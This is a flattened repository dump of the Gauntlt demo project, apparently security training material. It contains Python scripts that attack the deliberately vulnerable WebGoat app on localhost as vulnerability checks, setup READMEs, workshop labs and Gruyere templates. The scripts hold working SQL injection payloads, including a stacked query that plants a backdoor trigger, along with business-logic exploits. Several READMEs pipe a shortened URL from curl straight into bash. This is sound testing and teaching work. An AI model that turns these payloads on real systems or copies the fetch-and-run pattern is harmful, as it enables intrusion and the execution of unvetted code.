39 | now_attack = session.post(attack_url, data=attack_payload)
40 |
41 | attack_successful = 'Congratulations. You have successfully completed this lesson'
42 | now_attack.text.find(attack_successful)
43 |
44 | if now_attack.text.find(attack_successful) == -1 :
45 | print 'vuln-30 not present'
46 | else :
47 | print 'vuln-30 is present'
48 |
49 |
--------------------------------------------------------------------------------
/labs/sxsw-2014/02_Setup using Vagrant.md:
--------------------------------------------------------------------------------
1 | ## Gauntlt
2 | The workshop uses a Vagrant box for the hands-on portion. Vagrant uses VirtualBox to run a fully contained virtual machine that will let you setup a test lab and get you started using gauntlt. These instructions should work with any host, however OS X and Ubuntu are preferred.
3 |
4 | ### Download gauntlt-sxsw.box (~700MB)
5 | ```
6 | $ wget http://bit.ly/rugged-sxsw-box
7 |
8 | # you might need to rename the box you downloaded
9 | $ mv rugged-sxsw-box gauntlt-sxsw.box
10 | ```
11 |
12 | ### Install VirtualBox
13 | ```
14 | https://www.virtualbox.org/
15 | ```
16 |
17 | ### Install Vagrant
18 | ```
19 | http://downloads.vagrantup.com/
20 | ```
21 |
22 | ### Set up a working directory
23 | ```
24 | $ mkdir ~/sxsw
25 | $ cd ~/sxsw
26 | $ vagrant box add sxsw /path/where/you/downloaded/gauntlt-sxsw.box
27 | $ vagrant init sxsw
28 | ```
29 |
30 | ### Edit the newly created VagrantFile and add these two lines
31 | ```
32 | config.vm.network :forwarded_port, guest: 3000, host: 3000
33 | config.vm.network :forwarded_port, guest: 8008, host: 8008
34 | ```
35 |
36 | ### Start up the box
37 | ```
38 | $ vagrant up
39 | $ vagrant ssh
40 | ```
41 | You should be greeted with `vagrant@precise32:~$` if it all worked ok.
42 |
43 | ### Initialize
44 | Make sure the repo is up-to-date
45 | ```
46 | vagrant@precise32:~$ cd gauntlt-demo
47 | vagrant@precise32:~/gauntlt-demo$ git pull
48 | vagrant@precise32:~/gauntlt-demo$ rvm use 1.9.3
49 | vagrant@precise32:~/gauntlt-demo$ bundle install
50 | ```
51 |
--------------------------------------------------------------------------------
/examples/webgoat/vuln-43/vuln-43-runner:
--------------------------------------------------------------------------------
1 | #! /usr/bin/python
2 | # Prints "Exploit succeded", "Exploit failed", or "Exploit error" (for when something doesn't work)
3 | import requests
4 | import json
5 |
6 | PREFIX = "http://127.0.0.1:8080/WebGoat/"
7 |
8 | s = requests.Session()
9 |
10 | r1 = s.get(PREFIX + "/login.mvc")
11 |
12 | r2 = s.post(PREFIX + "j_spring_security_check", data={"username": "guest", "password": "guest"})
13 | if "Logout" not in r2.text:
14 | print("Exploit error (login failed)")
15 | exit()
16 |
17 |
18 | attack_link = ""
19 |
20 | r3 = s.get(PREFIX + "service/lessonmenu.mvc")
21 | data = json.loads(r3.text)
22 | for category in data:
23 | if category["name"] == "Concurrency":
24 | for c in category["children"]:
25 | if c["name"] == "Shopping Cart Concurrency Flaw":
26 | attack_link = c["link"]
27 |
28 | if attack_link == "":
29 | print("Exploit error (couldn't find attack link)")
30 | exit()
31 |
32 | r4 = s.post(PREFIX + attack_link, data={"QTY1": "1", "QTY2": "0", "QTY3": "0", "QTY4": "0", "SUBMIT": "Update Cart"})
33 | r5 = s.post(PREFIX + attack_link, data={"QTY1": "1", "QTY2": "0", "QTY3": "0", "QTY4": "0", "SUBMIT": "Purchase"})
34 | r6 = s.post(PREFIX + attack_link, data={"QTY1": "0", "QTY2": "0", "QTY3": "1", "QTY4": "0", "SUBMIT": "Update Cart"})
35 | r7 = s.post(PREFIX + attack_link, data={"CC": "5321 1337 8888 2007", "PAC": "111", "SUBMIT": "Confirm"})
36 |
37 | if "Police" in r7.text:
38 | print("Exploit succeeded")
39 | else:
40 | print("Exploit failed")
41 |
42 |
--------------------------------------------------------------------------------
/examples/webgoat/vuln-41/README.md:
--------------------------------------------------------------------------------
1 | ##TEST vuln-41.attack
2 |
3 | This is a Gauntlt Test to check if the vulnerability in WebGoat located at AJAX Security => Silent Transactions Attacks (vuln-41) exists.
4 |
5 | It will return a
6 | - 1 (error) if a vulnerability exists
7 | - 0 (success) if the vulnerability is fixed (aka not present)
8 |
9 | ##Setup
10 |
11 | (1) The environment is set up correctly. This attack assumes you have a Hacking-Lab VM. Launch a root terminal and run:
12 | ```
13 | $ curl -sSL http://bit.ly/1MJ3qNp | bash
14 | ```
15 |
16 | Make sure WebGoat is installed without problems. Make sure FoxyProxy is disabled and open Applications => Other => WebGoatSTART.
17 |
18 | Now make sure Gauntlt is installed without problems. Open Applications => Accessories => Terminal and run in the home directory:
19 | ```
20 | $ which gauntlt
21 | $ source .rvm/scripts/rvm
22 | $ which gauntlt
23 | ```
24 |
25 | (2) The Python Requests library is installed
26 | ```
27 | $ git clone git://github.com/kennethreitz/requests.git
28 | $ cd requests
29 | $ python setup.py install
30 | ```
31 |
32 | ## Testing the Attack
33 |
34 | (1) To run the gauntlt attack, go to examples/webgoat/vuln-41 and call:
35 | ```
36 | $ gauntlt vuln-41.attack
37 | ```
38 |
39 | It is written to pass when the vulnerability is fixed.
40 |
41 | (2) To run our python script directly, go to examples/webgoat/vuln-41 and run:
42 | ```
43 | $ python attack.py
44 | ```
45 |
46 | Inside the gauntlt attack file, the absolute path of the python script must be included, otherwise gauntlt won't be able to find the script.
47 |
--------------------------------------------------------------------------------
/examples/webgoat/vuln-21/READ.md:
--------------------------------------------------------------------------------
1 |
2 | #Bling SQL Injection - Case Study
3 | TEST vuln-21.attack
4 | A.T.O.M.
5 | Patrizio Chiquini
6 | Omar Mahmud
7 |
8 | This is a Gauntlt test to check if the vulnerability in WebGoat
9 | located at General => HTTP Basics (vuln-21) exists.
10 |
11 | It will return a
12 |
13 | 1 (error) if the vulnerability is present
14 |
15 | 0 (success) if the vulnerability is fixed (aka not present)
16 |
17 |
18 | #Set Up
19 |
20 | This test assumes 3 things: that:
21 |
22 | (1) WebGoat and Gauntl are installed on your VM
23 |
24 | Run the following curl-bash script to do the install.
25 |
26 | curl -sSL http://bit.ly/1MJ3qNp | bash
27 |
28 |
29 | (2) Paths and vuln-21 directories are correctly set |
30 | Making sure the environment for WebGoat and Gauntlt are set
31 |
32 | You can check this respectively:
33 |
34 | $which ruby
35 | /home/hacker/.rvm/gems/ruby-2.2.1/bin/ruby
36 |
37 | $which gauntlt
38 | /home/hacker/.rvm/gems/ruby-2.2.1/bin/gauntlt
39 |
40 |
41 | (3) There is a local proxy running on 127.0.0.1:8888
42 |
43 | Testing vuln-00 can be done outside of Gauntlt by navigating to the webgoat/vuln-21 directory and running:
44 |
45 | $ ./exploit-vuln-21.bash
46 |
47 | (4) Python-Pip is properly installed
48 |
49 | You can achieve this with:
50 |
51 | apt-get install python-pip
52 |
53 | pip insall request
54 |
55 |
56 | (5) (Optional) Install Geany to use as Editor for Python
57 |
58 | apt-get install geany geany-plugins
59 |
60 |
61 |
62 |
63 | This Gauntlt test was written by Patrizio Chiquini & Omar on December 11th, 2015
64 |
--------------------------------------------------------------------------------
/examples/webgoat/vuln-00/README.md:
--------------------------------------------------------------------------------
1 | TEST vuln-00.attack
2 |
3 | This is a Gauntlt test to check if the vulnerability in WebGoat located at General => Http Basics (vuln-00) exists.
4 |
5 | It will return a
6 | - 1 (error) if the vulnerability is present
7 | - 0 (success) if the vulnerability is fixed (aka not present)
8 |
9 | This test assumes 3 things:
10 |
11 | (1) That jerry-curl and jq are installed and available on the $PATH and uses the generic command-line attack. To install these run the following command on Debian-based systems aka those using .deb packages.
12 |
13 | ```
14 | $ sudo apt-get install owasp-wte-jerry-curl owasp-wte-jq
15 | ```
16 |
17 | This assumes you have the OWASP WTE repo setup on the computer running Gauntlt. If not, it can be added with:
18 |
19 | ```
20 | $ sudo echo "deb http://appseclive.org/apt/14.04 trusty main" > /etc/apt/sources.list.d/owasp-wte.list
21 | $ sudo wget -q -O - http://appseclive.org/apt/owasp-wte.gpg.key | apt-key add -
22 | ```
23 |
24 | (2) The script ./webgoat/vuln-00/vuln-00-runner is in the path aka $PATH This can be done & confirmed with:
25 |
26 | ```
27 | $ sudo cp webgoat/vuln-00/vuln-00-runner /usr/bin/
28 | $ sudo chmod 775 /usr/bin/vuln-00-runner
29 | $ which vuln-00-runner
30 | /usr/bin/vuln-00-runner
31 | ```
32 |
33 | (3) There is a local proxy running on 127.0.0.1:8888
34 |
35 | Testing vuln-00 can be done outside of Gauntlt by navigating to the webgoat/vuln-00 directory and running:
36 |
37 | ```
38 | $ ./exploit-vuln-00.bash
39 | ```
40 |
41 | This Gauntlt test was written by Matt Tesauro (matt.tesauro@owasp.org) on Mon, 23 Nov 2015 22:43:10 -0600
42 |
43 |
--------------------------------------------------------------------------------
/examples/webgoat/vuln-17/attack.py:
--------------------------------------------------------------------------------
1 | import requests
2 | import sys
3 |
4 | prox = {
5 | 'http' : '127.0.0.1:8000'
6 | }
7 |
8 | login = {
9 | 'username' : 'guest',
10 | 'password' : 'guest'
11 | }
12 |
13 | # this var is changeable
14 | name = '\' or 1=1; --'
15 |
16 | injection = {
17 | 'account_name' : name,
18 | 'submit' : 'Go!'
19 | }
20 | url1 = 'http://127.0.0.1:8080/WebGoat/login.mvc'
21 | url2 = 'http://127.0.0.1:8080/WebGoat/j_spring_security_check'
22 | url3 = 'http://127.0.0.1:8080/WebGoat/service/lessonmenu.mvc'
23 |
24 | flag = 0
25 | s = requests.Session()
26 | r1 = s.post(url2, data=login, proxies = prox)
27 | r2 = s.get(url3, proxies = prox)
28 |
29 | spl = r2.text.split("String SQL Injection")
30 | string = spl[1]
31 | index = string.find("Screen=")
32 | num = string[index + 7: index + 11]
33 |
34 | url4 = 'http://127.0.0.1:8080/WebGoat/attack?Screen=' + num + '&menu=1100'
35 | url5 = 'http://127.0.0.1:8080/WebGoat/service/restartlesson.mvc'
36 |
37 | r3 = s.get(url4, proxies = prox)
38 | r4 = s.post(url4, data=injection, proxies=prox)
39 |
40 | spl = r4.text.split("Gruyere: Sign up
12 | 13 |
14 |
59 |
60 |
61 |
62 |
63 |
--------------------------------------------------------------------------------
/examples/webgoat/vuln-02/README.md:
--------------------------------------------------------------------------------
1 | ## Multi Level Authentication 1
2 | This is a test to check if the vulnerability in the multi level authentication of Web Goat exists.
3 |
4 | It will return a
5 | - 1 (error) if the vulnerability is present, It will also print ‘vulnerable’
6 | - 0 (success) if the vulnerability is fixed (aka not present)
7 |
8 | This test assumes 3 things:
9 |
10 | * That python and a few libraries are installed. This includes requests, re, json, and some system libraries installed with python. If any of these are missing, the pip installer can help with the installation process.
11 |
12 | See https://pip.pypa.io/en/stable/installing/ for details about pip installation.
13 |
14 | Following the installation of pip, install any missing packages with a command formatted like the following:
15 |
16 | ```
17 | pip install requests
18 | ```
19 |
20 | * We also assume that you have Gauntlt running. If not, the directions are on their site at http://gauntlt.org/.
21 |
22 | The attack file vuln-02.attack needs to know the absolute path to the vuln-02.py file in order to run it successfully.
23 | There is a local proxy running on 127.0.0.1:8888 if you run the script with the -d flag.
24 |
25 | You can also test the vulnerability with the python script outside of gauntlt by navigating to the folder containing vuln-02.py and running the following command. If you use the -d flag it will use the proxy running at 127.0.0.1:8888
26 |
27 | ```
28 | $ python vuln-02.py -d
29 | ```
30 | * We lastly assume that you are using the Hacking Lab OS. The gauntlt demo was placed in the home directory of hacker. To run the python exploit script with gauntlt python script should be placed in the following location:
31 | ```
32 | /home/hacker/gauntlt-demo/examples/webgoat/vuln-02/vuln-02.py
33 | ```
34 |
35 | This Gauntlt test was written by Taylor Smith and Jeremy Wenzel
36 |
37 |
--------------------------------------------------------------------------------
/examples/webgoat/vuln-20/exploit-vuln-20.py:
--------------------------------------------------------------------------------
1 | import requests
2 | import unicodedata
3 |
4 | url1 = "http://127.0.0.1:8080/WebGoat/login.mvc"
5 | url2 = "http://127.0.0.1:8080/WebGoat/j_spring_security_check"
6 | url3 = "http://127.0.0.1:8080/WebGoat/service/lessonmenu.mvc"
7 | loginInfo = {'username':'guest','password':'guest'}
8 | stage1success = "succeeded"
9 | stage2success = "successfully"
10 |
11 | session = requests.Session()
12 | start = session.get(url1)
13 | login = session.post(url2,data=loginInfo)
14 |
15 | #Parse lesson menu
16 | lessonMenu = session.get(url3)
17 | menuJson = lessonMenu.json()
18 | vulnLinkSectUnicode = menuJson[10]["children"][8]["link"]
19 | vulnLinkSect = unicodedata.normalize("NFKD", vulnLinkSectUnicode).encode("ascii","ignore")
20 |
21 | #Request the lesson
22 | fullVulnLink = "http://127.0.0.1:8080/WebGoat/" + vulnLinkSect
23 | page = session.get(fullVulnLink)
24 |
25 | #Reset lesson | Do this to clear previous lessons
26 | page = session.get("http://127.0.0.1:8080/WebGoat/service/restartlesson.mvc")
27 |
28 | #Complete stage 1
29 | stage1Payload = {"username":"101 or 1=1; update employee set salary=100000"}
30 | page = session.post(fullVulnLink,data=stage1Payload)
31 | stage1_status = page.text.find(stage1success)
32 |
33 | #Complete stage 2
34 | stage2Payload = {"username":"101; CREATE TRIGGER myBackDoor BEFORE INSERT ON employee FOR EACH ROW BEGIN UPDATE employee SET email='john@hackme.com' WHERE userid = NEW.userid"}
35 | page = session.post(fullVulnLink,data=stage2Payload)
36 | stage2_status = page.text.find(stage2success)
37 | if stage1_status > -1:
38 | print "Vuln-20 Stage 1 Attack Successful"
39 | if stage2_status > -1:
40 | print "Vuln-20 Stage 2 Attack Successful"
41 | else:
42 | print "Vuln-20 Stage 2 Attack Unsuccessful"
43 | else:
44 | print "Vuln-20 Stage 1 Attack Unsuccessful"
45 | print "Unable to Reach Vuln-20 Stage 2 Attack"
46 |
--------------------------------------------------------------------------------
/examples/webgoat/vuln-38/README.md:
--------------------------------------------------------------------------------
1 | TEST vuln-38.attack
2 |
3 | This is a Gauntlt test to check if the vulnerability in WebGoat located at Authentication Flaws => Forgot Password (vuln-38) exists.
4 |
5 | It will return a
6 | - 1 (error) if the vulnerability is present
7 | - 0 (success) if the vulnerability is fixed (aka not present)
8 |
9 | This test assumes 3 things:
10 |
11 | (1) That python and python-requests are installed and available on the $PATH and uses the generic command-line attack. To install these run the following command on Debian-based systems aka those using .deb packages.
12 |
13 | ```
14 | $ sudo apt-get install python python-requests
15 | ```
16 |
17 | This assumes you have the OWASP WTE repo setup on the computer running Gauntlt. If not, it can be added with:
18 |
19 | ```
20 | $ sudo echo "deb http://appseclive.org/apt/14.04 trusty main" > /etc/apt/sources.list.d/owasp-wte.list
21 | $ sudo wget -q -O - http://appseclive.org/apt/owasp-wte.gpg.key | apt-key add -
22 | ```
23 |
24 | (2) The python attack file and the text files for the usernames and colors ./webgoat/vuln-38/attack.py is in the path aka $PATH This can be done & confirmed with:
25 |
26 | ```
27 | $ sudo cp webgoat/vuln-38/attack.py /usr/bin/
28 | $ sudo chmod 775 /usr/bin/attack.py
29 | $ which attack.py
30 | /usr/bin/attack.py
31 |
32 | $ sudo cp webgoat/vuln-38/usernames.txt /usr/bin/
33 | $ sudo chmod 775 /usr/bin/usernames.txt
34 | $ which usernames.txt
35 | /usr/bin/usernames.txt
36 |
37 | $ sudo cp webgoat/vuln-38/color.txt /usr/bin/
38 | $ sudo chmod 775 /usr/bin/color.txt
39 | $ which color.txt
40 | /usr/bin/color.txt
41 |
42 | ```
43 |
44 | (3) There is a local proxy running on 127.0.0.1:8080
45 |
46 | Testing vuln-38 can be done outside of Gauntlt by navigating to the webgoat/vuln-38 directory and running:
47 |
48 | ```
49 | $ python attack.py
50 | ```
51 |
52 | This Gauntlt test was written by Nick Kantor and Tanner Harper
53 |
--------------------------------------------------------------------------------
/vendor/gruyere/source/resources/home.gtl:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | Sign up for a new account.
15 | 16 | [[if:_message]] 17 | 18 | [[/if:_message]] 19 | 20 | 58 |
14 |
17 | Gruyere: Home
15 | 16 |
18 |
19 | [[if:_profile.private_snippet]]
20 |
55 |
56 |
57 |
58 |
--------------------------------------------------------------------------------
/examples/webgoat/vuln-06/README.md:
--------------------------------------------------------------------------------
1 | TEST Vuln-06.attack
2 |
3 | This is a Gauntlt test to check if the vulnerability in WebGoat located at Cross-Site Scripting (XSS) => LAB: Cross-Sit Scripting => Stage 1: Stored XSS (vuln-06) exists.
4 |
5 | It will return a
6 |
7 | > XSS Present (error) if the vulnerability is present
8 |
9 | > No XSS Present (success) if the vulnerability is fixed (aka not present)
10 |
11 |
12 | This test assumes 3 things:
13 |
14 | 1. The script ./gauntlt-demo/examples/webgoat/vuln-06/Vuln-06.attack and ./gauntlt-demo/examples/webgoat/vuln-06/attack.py is in the correct path
15 |
16 | 2. The command line is in the script's directory.
17 |
18 | 3. There is a local proxy running on 127.0.0.1:8888
19 |
20 | 4. WebGoat is running on 127.0.0.1:8080
21 |
22 | Testing vuln-06 can be done outside of Gauntlt by navigating to the gauntlt-demo/XSS and running:
23 |
24 | $ gauntlt
25 |
26 |
27 | This Gauntlt test was written by Grant Weston (grantweston76@gmail.com) and Charlina Hung (charlina.hung@gmail.com) on Wed, 9 Dec 2015
28 |
29 | TEST Vuln-06.attack
30 |
31 | This is a Gauntlt test to check if the vulnerability in WebGoat located at Cross-Site Scripting (XSS) => LAB: Cross-Sit Scripting => Stage 1: Stored XSS (vuln-06) exists.
32 |
33 | It will return a
34 |
35 | > XSS Present (error) if the vulnerability is present
36 | >
37 | > No XSS Present (success) if the vulnerability is fixed (aka not present)
38 |
39 |
40 | This test assumes 3 things:
41 |
42 | 1. The script ./gauntlt-demo/examples/webgoat/vuln-06/Vuln-06.attack and ./gauntlt-demo/examples/webgoat/vuln-06/attack.py is in the correct path
43 |
44 | 2. There is a local proxy running on 127.0.0.1:8888
45 |
46 | 3. WebGoat is running on 127.0.0.1:8080
47 |
48 | Testing vuln-06 can be done outside of Gauntlt by navigating to the gauntlt-demo/XSS and running:
49 |
50 | $ gauntlt
51 |
52 |
53 | This Gauntlt test was written by Grant Weston (grantweston76@gmail.com) and Charlina Hung (charlina.hung@gmail.com) on Wed, 9 Dec 2015
54 |
--------------------------------------------------------------------------------
/examples/webgoat/vuln-25/exploit-vuln-25.py:
--------------------------------------------------------------------------------
1 | import requests, json
2 |
3 | urlLogin = "http://127.0.0.1:8080/WebGoat/login.mvc"
4 | urlRealLogin = "http://127.0.0.1:8080/WebGoat/j_spring_security_check"
5 | urlStart = "http://127.0.0.1:8080/WebGoat/start.mvc"
6 | urlJSON = "http://127.0.0.1:8080/WebGoat/service/lessonmenu.mvc"
7 |
8 | urlRandomMenu = "http://127.0.0.1:8080/WebGoat/attack?Screen=32&menu=5"
9 |
10 | username = 'guest'
11 | password = 'guest'
12 |
13 | #This isn't really needed since we are using the session feature in the requests library
14 | #req = requests.get(urlLogin)
15 | #session_1_cookie = req.cookies['JSESSIONID']
16 |
17 | #logs into webgoat and stores session cookie for later use
18 | s = requests.Session()
19 | data = {'username':'guest', 'password':'guest'}
20 | r = s.post(urlRealLogin, data=data)
21 | session_2_cookie = s.cookies['JSESSIONID']
22 |
23 |
24 | #retrieves json data for dynamic menu and parses it for our vulnerability
25 | r = s.get(urlJSON)
26 |
27 | json = json.loads(r.text)
28 |
29 | found = False
30 | current_menu_location = ""
31 | count = 0;
32 |
33 | for menu_item in json:
34 | for item in menu_item:
35 | if(item == "name"):
36 | if(json[count][item] == "Insecure Configuration"):
37 | current_menu_location = json[count]["children"][0]["link"]
38 | found = True
39 | break
40 | if(found):
41 | break
42 | count = count + 1
43 |
44 | vulnUrl = "http://127.0.0.1:8080/WebGoat/attack" + current_menu_location[6:]
45 | configURL = "http://127.0.0.1:8080/WebGoat/conf" + current_menu_location[6:]
46 |
47 | #loads the vulnerable page
48 | r = s.get(vulnUrl)
49 |
50 | #executes vulnerability
51 | r = s.get(configURL)
52 |
53 | #if the result of executing the vulnerability is the
54 | #configuration page, exit with value 1 (attack successful)
55 | #else exit with value 0 (vulnerability is fixed/not present)
56 | if ("Welcome to WebGoat Configuration Page" in r.text):
57 | print "vuln-25 present"
58 | #exit(1)
59 | else:
60 | print "vuln-25 not present"
61 | #exit(0)
62 |
63 |
64 |
65 |
66 |
--------------------------------------------------------------------------------
/labs/sxsw-2014/06_Port Check.md:
--------------------------------------------------------------------------------
1 | ## Port checking with nmap
2 | Gauntlt supports nmap. Lets write a real simple port check attack.
3 |
4 | To get started with this, go to `examples/port_check` and open up `challenge_port-check.attack`. Besides using `Background` there is one new concept that we are using in this challenge. We use the `And the following profile:` which is the same as saying `Given the following profile:`.
5 |
6 | ### Profiles
7 | Gauntlt uses profiles in setup steps to pass in values to the subsequent steps. These profiles must start with the first line of `| name | value |` but after that you can assign names and values as you see fit. Once we work with attack aliases we will see why that is important.
8 |
9 | ### Try the challenge
10 | Edit the `challenge_port-check.attack` and try to test to see if port 8008 is open. You can run `$ bundle exec gauntlt challenge_port-check.attack` to see if your solution works. Check the README.md in `examples/port_check` for hints.
11 |
12 | ### Solution
13 | The answer is in `final_port-check.attack` and you can compare it to your solution. Run `$ bundle exec gauntlt final_port-check.attack` and you should see the following output:
14 |
15 | ```
16 | @final @slow
17 | Feature: check to make sure the right ports are open on our server
18 |
19 | Background: # port_check/final_port-check.attack:4
20 | Given "nmap" is installed # gauntlt-1.0.6/lib/gauntlt/attack_adapters/nmap.rb:4
21 | And the following profile: # gauntlt-1.0.6/lib/gauntlt/attack_adapters/gauntlt.rb:9
22 | | name | value |
23 | | host | localhost |
24 |
25 | Scenario: Verify server is open on expected ports # port_check/final_port-check.attack:10
26 | When I launch an "nmap" attack with: # gauntlt-1.0.6/lib/gauntlt/attack_adapters/nmap.rb:8
27 | """
28 | nmap -F | 22 | | 23 | Private snippet 24 | | 25 |26 | Show ► 27 | 30 | | 31 |
| Most recent snippets: | ||
|
39 | [[if:icon]] |
41 | 42 | [[if:name]]{{name:text}}[[/if:name]][[if:!name]]{{_key}}[[/if:!name]] 43 | | 44 |{{snippets.0:html}}
45 | 46 | All snippets 47 | Homepage 48 | 49 | 50 | |
51 |